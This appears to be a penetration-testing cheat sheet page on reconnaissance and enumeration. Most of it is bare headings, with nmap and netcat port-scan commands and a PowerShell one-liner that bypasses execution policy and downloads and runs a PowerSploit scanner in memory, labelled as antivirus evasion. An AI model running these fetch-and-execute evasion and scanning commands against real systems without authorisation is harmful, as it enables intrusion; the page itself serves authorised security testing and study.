Reconnaissance & enumeration
Enum, enum, enom, enomm, nom nomm!
Bash log
script target.logPort scanning
Nmap
nmap -A -sS -Pn -n x.x.x.xnmap -sU -p- --max-retries 0 --min-rate 500 x.x.x.xNc
nc -nvv -w 1 -z x.x.x.x 1-100PowerShell (in memory -> AV evasion)
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts x.x.x.x"Host enum
DNS zone transfer
Web fuzzing
Samba (SMB)
SNMP
CMS
CMSmap
WPscan
SQL injection
Test for authentication bypass
Use time delays to find injectable parameter
Local File Inclusion (LFI)
Basic checks
LFI Wrappers
LFI to RCE
Remote File Inclusion (RFI)
Check for egress filtering
Files and file systems
Last updated